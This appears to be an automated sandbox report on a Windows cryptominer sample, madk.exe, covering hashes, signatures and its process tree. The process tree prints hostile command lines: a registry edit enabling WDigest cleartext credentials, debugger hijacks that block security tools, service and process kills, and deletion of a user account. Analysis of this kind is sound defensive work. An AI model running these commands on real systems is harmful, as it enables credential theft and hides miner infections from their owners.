Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2022 23:59
Behavioral task
behavioral1
Sample
madk.exe
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
madk.exe
Resource
win10v2004-20220812-en
General
-
Target
madk.exe
-
Size
3.4MB
-
MD5
d00af5991807952929e5b986afd295c9
-
SHA1
7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
-
SHA256
025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
-
SHA512
c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
-
SSDEEP
98304:jKqtESnFRAW/YS7gCPJDEYFu6GyPuzBPrQ:FnFRV/Bt1E8u6yNQ
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 4284 wevtutil.exe 2896 wevtutil.exe 1348 wevtutil.exe -
XMRig Miner payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig C:\Windows\Fonts\rundlls.exe xmrig \??\c:\windows\Fonts\rundlls.exe xmrig behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp xmrig -
Executes dropped EXE 17 IoCs
Processes:
svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exepid process 3540 svchost.exe 2664 svchost.exe 1764 svchost.exe 2164 svchost.exe 4848 svchost.exe 3568 svchost.exe 4072 conhost.exe 2888 svchost.exe 5100 svchost.exe 3544 svchost.exe 3676 svchost.exe 4128 svchost.exe 1044 svchost.exe 4440 svchost.exe 4996 svchost.exe 1764 svchost.exe 2640 rundlls.exe -
Sets file execution options in registry 2 TTPs 20 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe reg.exe -
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4016 attrib.exe 3044 attrib.exe 1388 attrib.exe 4360 attrib.exe 4268 attrib.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx \??\c:\windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmp upx \??\c:\windows\Fonts\conhost.exe upx C:\Windows\Fonts\conhost.exe upx behavioral2/memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmp upx behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmp upx C:\Windows\Fonts\svchost.exe upx C:\Windows\Fonts\svchost.exe upx behavioral2/memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmp upx behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp upx behavioral2/memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
madk.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation madk.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exepid process 460 takeown.exe 1812 takeown.exe 3744 takeown.exe 1884 takeown.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\F: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\A: svchost.exe -
Drops file in Windows directory 64 IoCs
Processes:
attrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\rundlls.exe conhost.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\svchost.exe attrib.exe File opened for modification C:\Windows\Fonts\sqlservr.exe attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File created \??\c:\windows\Fonts\WinRing0x64.sys madk.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe File opened for modification C:\Windows\Fonts attrib.exe -
Launches sc.exe 23 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1744 sc.exe 2748 sc.exe 3996 sc.exe 5024 sc.exe 4108 sc.exe 1340 sc.exe 824 sc.exe 3160 sc.exe 4240 sc.exe 3212 sc.exe 3004 sc.exe 4184 sc.exe 4948 sc.exe 3808 sc.exe 4764 sc.exe 1644 sc.exe 3692 sc.exe 5100 sc.exe 1216 sc.exe 2980 sc.exe 776 sc.exe 4916 sc.exe 2888 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with WMI 4 IoCs
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 5088 WMIC.exe 1644 WMIC.exe 4576 WMIC.exe 1856 WMIC.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1188 taskkill.exe 1088 taskkill.exe 2464 taskkill.exe 4976 taskkill.exe 980 taskkill.exe 2712 taskkill.exe 2716 taskkill.exe 4812 taskkill.exe 3756 taskkill.exe 3504 taskkill.exe 5024 taskkill.exe 2212 taskkill.exe 4572 taskkill.exe 4840 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
madk.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings madk.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepid process 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe 4072 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exesvchost.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 5024 taskkill.exe Token: SeDebugPrivilege 2716 taskkill.exe Token: SeDebugPrivilege 2212 taskkill.exe Token: SeDebugPrivilege 1188 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 3756 taskkill.exe Token: SeDebugPrivilege 4572 taskkill.exe Token: SeDebugPrivilege 2464 taskkill.exe Token: SeLockMemoryPrivilege 2640 rundlls.exe Token: SeAuditPrivilege 3756 svchost.exe Token: SeAuditPrivilege 3756 svchost.exe Token: SeAuditPrivilege 3756 svchost.exe Token: SeIncreaseQuotaPrivilege 5088 WMIC.exe Token: SeSecurityPrivilege 5088 WMIC.exe Token: SeTakeOwnershipPrivilege 5088 WMIC.exe Token: SeLoadDriverPrivilege 5088 WMIC.exe Token: SeSystemProfilePrivilege 5088 WMIC.exe Token: SeSystemtimePrivilege 5088 WMIC.exe Token: SeProfSingleProcessPrivilege 5088 WMIC.exe Token: SeIncBasePriorityPrivilege 5088 WMIC.exe Token: SeCreatePagefilePrivilege 5088 WMIC.exe Token: SeBackupPrivilege 5088 WMIC.exe Token: SeRestorePrivilege 5088 WMIC.exe Token: SeShutdownPrivilege 5088 WMIC.exe Token: SeDebugPrivilege 5088 WMIC.exe Token: SeSystemEnvironmentPrivilege 5088 WMIC.exe Token: SeRemoteShutdownPrivilege 5088 WMIC.exe Token: SeUndockPrivilege 5088 WMIC.exe Token: SeManageVolumePrivilege 5088 WMIC.exe Token: 33 5088 WMIC.exe Token: 34 5088 WMIC.exe Token: 35 5088 WMIC.exe Token: 36 5088 WMIC.exe Token: SeIncreaseQuotaPrivilege 5088 WMIC.exe Token: SeSecurityPrivilege 5088 WMIC.exe Token: SeTakeOwnershipPrivilege 5088 WMIC.exe Token: SeLoadDriverPrivilege 5088 WMIC.exe Token: SeSystemProfilePrivilege 5088 WMIC.exe Token: SeSystemtimePrivilege 5088 WMIC.exe Token: SeProfSingleProcessPrivilege 5088 WMIC.exe Token: SeIncBasePriorityPrivilege 5088 WMIC.exe Token: SeCreatePagefilePrivilege 5088 WMIC.exe Token: SeBackupPrivilege 5088 WMIC.exe Token: SeRestorePrivilege 5088 WMIC.exe Token: SeShutdownPrivilege 5088 WMIC.exe Token: SeDebugPrivilege 5088 WMIC.exe Token: SeSystemEnvironmentPrivilege 5088 WMIC.exe Token: SeRemoteShutdownPrivilege 5088 WMIC.exe Token: SeUndockPrivilege 5088 WMIC.exe Token: SeManageVolumePrivilege 5088 WMIC.exe Token: 33 5088 WMIC.exe Token: 34 5088 WMIC.exe Token: 35 5088 WMIC.exe Token: 36 5088 WMIC.exe Token: SeIncreaseQuotaPrivilege 1644 WMIC.exe Token: SeSecurityPrivilege 1644 WMIC.exe Token: SeTakeOwnershipPrivilege 1644 WMIC.exe Token: SeLoadDriverPrivilege 1644 WMIC.exe Token: SeSystemProfilePrivilege 1644 WMIC.exe Token: SeSystemtimePrivilege 1644 WMIC.exe Token: SeProfSingleProcessPrivilege 1644 WMIC.exe Token: SeIncBasePriorityPrivilege 1644 WMIC.exe Token: SeCreatePagefilePrivilege 1644 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundlls.exepid process 2640 rundlls.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
madk.execonhost.exepid process 3460 madk.exe 3460 madk.exe 4072 conhost.exe 4072 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
madk.execmd.exedescription pid process target process PID 3460 wrote to memory of 3520 3460 madk.exe cmd.exe PID 3460 wrote to memory of 3520 3460 madk.exe cmd.exe PID 3460 wrote to memory of 3520 3460 madk.exe cmd.exe PID 3460 wrote to memory of 520 3460 madk.exe reg.exe PID 3460 wrote to memory of 520 3460 madk.exe reg.exe PID 3460 wrote to memory of 520 3460 madk.exe reg.exe PID 3460 wrote to memory of 4248 3460 madk.exe reg.exe PID 3460 wrote to memory of 4248 3460 madk.exe reg.exe PID 3460 wrote to memory of 4248 3460 madk.exe reg.exe PID 3460 wrote to memory of 4584 3460 madk.exe reg.exe PID 3460 wrote to memory of 4584 3460 madk.exe reg.exe PID 3460 wrote to memory of 4584 3460 madk.exe reg.exe PID 3460 wrote to memory of 2088 3460 madk.exe reg.exe PID 3460 wrote to memory of 2088 3460 madk.exe reg.exe PID 3460 wrote to memory of 2088 3460 madk.exe reg.exe PID 3460 wrote to memory of 3392 3460 madk.exe reg.exe PID 3460 wrote to memory of 3392 3460 madk.exe reg.exe PID 3460 wrote to memory of 3392 3460 madk.exe reg.exe PID 3460 wrote to memory of 1216 3460 madk.exe sc.exe PID 3460 wrote to memory of 1216 3460 madk.exe sc.exe PID 3460 wrote to memory of 1216 3460 madk.exe sc.exe PID 3460 wrote to memory of 4184 3460 madk.exe sc.exe PID 3460 wrote to memory of 4184 3460 madk.exe sc.exe PID 3460 wrote to memory of 4184 3460 madk.exe sc.exe PID 3460 wrote to memory of 1340 3460 madk.exe sc.exe PID 3460 wrote to memory of 1340 3460 madk.exe sc.exe PID 3460 wrote to memory of 1340 3460 madk.exe sc.exe PID 3460 wrote to memory of 3808 3460 madk.exe sc.exe PID 3460 wrote to memory of 3808 3460 madk.exe sc.exe PID 3460 wrote to memory of 3808 3460 madk.exe sc.exe PID 3460 wrote to memory of 4948 3460 madk.exe sc.exe PID 3460 wrote to memory of 4948 3460 madk.exe sc.exe PID 3460 wrote to memory of 4948 3460 madk.exe sc.exe PID 3460 wrote to memory of 1744 3460 madk.exe sc.exe PID 3460 wrote to memory of 1744 3460 madk.exe sc.exe PID 3460 wrote to memory of 1744 3460 madk.exe sc.exe PID 3460 wrote to memory of 4764 3460 madk.exe sc.exe PID 3460 wrote to memory of 4764 3460 madk.exe sc.exe PID 3460 wrote to memory of 4764 3460 madk.exe sc.exe PID 3460 wrote to memory of 2748 3460 madk.exe sc.exe PID 3460 wrote to memory of 2748 3460 madk.exe sc.exe PID 3460 wrote to memory of 2748 3460 madk.exe sc.exe PID 3460 wrote to memory of 2712 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2712 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2712 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 5024 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 5024 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 5024 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2716 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2716 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2716 3460 madk.exe taskkill.exe PID 3460 wrote to memory of 2536 3460 madk.exe net.exe PID 3460 wrote to memory of 2536 3460 madk.exe net.exe PID 3460 wrote to memory of 2536 3460 madk.exe net.exe PID 3460 wrote to memory of 5056 3460 madk.exe net1.exe PID 3460 wrote to memory of 5056 3460 madk.exe net1.exe PID 3460 wrote to memory of 5056 3460 madk.exe net1.exe PID 3520 wrote to memory of 3936 3520 cmd.exe attrib.exe PID 3520 wrote to memory of 3936 3520 cmd.exe attrib.exe PID 3520 wrote to memory of 3936 3520 cmd.exe attrib.exe PID 3460 wrote to memory of 232 3460 madk.exe net.exe PID 3460 wrote to memory of 232 3460 madk.exe net.exe PID 3460 wrote to memory of 232 3460 madk.exe net.exe PID 3460 wrote to memory of 1644 3460 madk.exe sc.exe -
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 2932 attrib.exe 1976 attrib.exe 3764 attrib.exe 4804 attrib.exe 1644 attrib.exe 2860 attrib.exe 4536 attrib.exe 3416 attrib.exe 4028 attrib.exe 4568 attrib.exe 384 attrib.exe 2248 attrib.exe 4744 attrib.exe 3508 attrib.exe 2916 attrib.exe 2248 attrib.exe 1528 attrib.exe 4900 attrib.exe 4828 attrib.exe 2712 attrib.exe 4140 attrib.exe 4008 attrib.exe 460 attrib.exe 4556 attrib.exe 860 attrib.exe 960 attrib.exe 2472 attrib.exe 2992 attrib.exe 2936 attrib.exe 4844 attrib.exe 744 attrib.exe 4296 attrib.exe 4892 attrib.exe 4764 attrib.exe 4464 attrib.exe 5012 attrib.exe 704 attrib.exe 916 attrib.exe 116 attrib.exe 2264 attrib.exe 4176 attrib.exe 3428 attrib.exe 1636 attrib.exe 3896 attrib.exe 520 attrib.exe 3848 attrib.exe 4396 attrib.exe 4764 attrib.exe 940 attrib.exe 3832 attrib.exe 2500 attrib.exe 3936 attrib.exe 3272 attrib.exe 420 attrib.exe 3936 attrib.exe 4364 attrib.exe 2840 attrib.exe 2248 attrib.exe 4660 attrib.exe 4680 attrib.exe 3704 attrib.exe 2020 attrib.exe 776 attrib.exe 4268 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\madk.exe"C:\Users\Admin\AppData\Local\Temp\madk.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f2⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MetPipAtcivator2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosotMais2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im d1lhots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dl1hots.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundlls.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
